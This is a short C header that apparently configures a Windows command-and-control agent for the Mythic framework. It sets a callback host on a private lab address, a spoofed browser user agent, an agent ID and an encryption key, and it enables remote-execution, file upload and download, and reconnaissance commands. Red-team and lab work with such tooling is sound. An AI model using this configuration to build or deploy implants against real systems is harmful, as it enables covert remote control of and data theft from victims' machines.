#ifndef CONFIG_H
#define CONFIG_H

// #define PIC_BUILD
#define PROFILE_MYTHIC_HTTP
#define CONFIG_SLEEP 3
#define CONFIG_SLEEP_JITTER 0
#define CONFIG_HOST L"192.168.56.111"
#define CONFIG_UA L"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
#define CONFIG_POST_URI L"/data"
#define CONFIG_UUID "ae605c45-48c5-4463-943c-641808a0a3ab"
#define CONFIG_ENCRYPT_KEY { 0x51, 0x34, 0xed, 0xcf, 0xe1, 0xc3, 0x1f, 0x87, 0x9f, 0xf8, 0x89, 0xf1, 0x2d, 0x6e, 0x35, 0x9a, 0x2f, 0xa8, 0x15, 0x45, 0xc7, 0x64, 0x00, 0x68, 0xec, 0xa9, 0x67, 0x2e, 0x9e, 0x45, 0x28, 0x8d }
#define REQUIRE_DLL_NTDLL
#define REQUIRE_DLL_KERNEL32
#define REQUIRE_DLL_WININET
#define REQUIRE_DLL_IPHLPAPI
#define REQUIRE_DLL_ADVAPI32
#define REQUIRE_DLL_WS2_32
#define REQUIRE_DLL_BCRYPT
#define INCLUDE_CMD_EXECUTE
#define INCLUDE_CMD_IPINFO
#define INCLUDE_CMD_MV
#define INCLUDE_CMD_MKDIR
#define INCLUDE_CMD_EXIT
#define INCLUDE_CMD_CP
#define INCLUDE_CMD_LS
#define INCLUDE_CMD_RM
#define INCLUDE_CMD_PWD
#define INCLUDE_CMD_SLEEP
#define INCLUDE_CMD_UPLOAD
#define INCLUDE_CMD_WHOAMI
#define INCLUDE_CMD_AGENTINFO
#define INCLUDE_CMD_CD
#define INCLUDE_CMD_DOWNLOAD
#define INCLUDE_CMD_LISTDRIVES
#define INCLUDE_CMD_HOSTNAME
#define INCLUDE_CMD_PS
#define INCLUDE_CMD_EXECUTE_HBIN

#endif
